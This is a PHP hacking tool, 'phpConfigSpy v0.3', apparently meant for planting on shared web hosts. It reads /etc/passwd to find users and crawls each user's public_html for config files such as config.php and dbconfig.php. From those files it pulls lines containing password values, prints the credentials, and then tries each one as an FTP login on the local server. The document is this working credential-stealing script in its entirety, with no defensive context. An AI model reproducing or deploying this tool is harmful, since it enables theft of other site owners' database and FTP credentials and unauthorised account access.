phpConfigSpy v0.3

Code:

<?php 
/* 
h-b@usa.com 
*/ 
echo '<html><head><title>phpConfigSpy v0.3</title></head><body>'; 
($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode = on</b>'); 
set_time_limit(0); 
################### 
@$passwd = fopen('/etc/passwd','r'); 
if (!$passwd) { die('<b>[-] Error : coudn`t read /etc/passwd</b>'); } 
$pub = array(); 
$users = array(); 
$conf = array(); 
$i = 0; 
while(!feof($passwd)) 
{ 
$str = fgets($passwd); 
 if ($i > 35) 
 { 
  $pos = strpos($str,':'); 
  $username = substr($str,0,$pos); 
  $dirz = '/home/'.$username.'/public_html/'; 
  if (($username != '')) 
  { 
   if (is_readable($dirz)) 
   { 
    array_push($users,$username); 
    array_push($pub,$dirz); 
   } 
  } 
   } 
$i++; 
} 
################### 
echo '<br><br><textarea cols="80" rows="60">'; 
echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"; 
echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"; 
echo "[~] Searching for passwords in config files...\n\n"; 
foreach ($users as $user) 
{ 
$path = "/home/$user/public_html/"; 
read_dir($path,$user); 
} 
echo "\n[+] Done\n"; 
function read_dir($path,$username) 
{ 
if ($handle = opendir($path)) 
{ 
 while (false !== ($file = readdir($handle))) 
 { 
  $fpath = "$path$file"; 
  if (($file != '.') and ($file != '..')) 
  { 
   if (is_readable($fpath)) 
   { 
    $dr = $fpath."/"; 
    if (is_dir($dr)) 
    { 
     read_dir($dr,$username); 
    } 
    else 
    { 
                        if ( 
                         ($file=='config.php') 
                        or ($file=='config.inc.php') 
                        or ($file=='conf.php') 
                        or ($file=='settings.php') 
                        or ($file=='setup.php') 
                        or ($file=='order.php') 
                        or ($file=='dbconf.php') 
                        or ($file=='db.inc.php') 
                        or ($file=='dbconfig.php') 
                        or ($file=='configuration.php') 
                        or ($file=='adminconfig.php') 
                        or ($file=='configoption.php') 
                        or ($file=='ini.inc.php') 
                        or ($file=='configitem.php') 
                        or ($file=='db.inc.php') 
                        or ($file=='dbconnect.php') 
                        or ($file=='conf-init.php') 
                        or ($file=='dbinfo.php') 
                        or ($file=='connect.php') 
                        or ($file=='configure.php') 
                        or ($file=='smtp.php') 
                        or ($file=='include.php') 
                        or ($file=='index.php') 
                        or ($file=='common.php') 
                        or ($file=='config_global.php') 
                        or ($file=='admin.php') 
                        or ($file=='db.php') 
                        or ($file=='connect.inc.php') 
                        or ($file=='dbconnect.inc.php')) 
                       { 
      $pass = get_pass($fpath); 
      if ($pass != '') 
      { 
       echo "[+] $fpath\n$pass\n"; 
       ftp_check($username,$pass); 
      } 
     } 
    } 
   } 
  } 
 } 
} 
} 
function get_pass($link) 
{ 
@$config = fopen($link,'r'); 
while(!feof($config)) 
{ 
 $line = fgets($config); 
 if (strstr($line,'pass') 
 or strstr($line,'pwd') 
 or strstr($line,'db_pass') 
 or strstr($line,'dbpass') 
 or strstr($line,'passwd')) 
 { 
  if (strrpos($line,'"')) 
  { 
   preg_match("/(.*)[^=]\"(.*)\"/",$line,$pass); 
   $pass = str_replace("]=\"","",$pass); 
  } 
   
  else 
   preg_match("/(.*)[^=]\'(.*)\'/",$line,$pass); 
   $pass = str_replace("]='","",$pass); 
  return $pass[2]; 
 } 
} 
} 
function ftp_check($login,$pass) 
{ 
@$ftp = ftp_connect('127.0.0.1'); 
if ($ftp) 
{ 
 @$res = ftp_login($ftp,$login,$pass); 
 if ($res) 
 { 
  echo '[FTP] '.$login.':'.$pass."  Success !\n"; 
 } 
 else ftp_quit($ftp); 
} 
} 
echo '</textarea><br><br>Coded by <b>Hack-Back</b> & <b>config-location-2@@8</b>  <a href=http://www.hac-zone.com></a></body></html>'; 
?>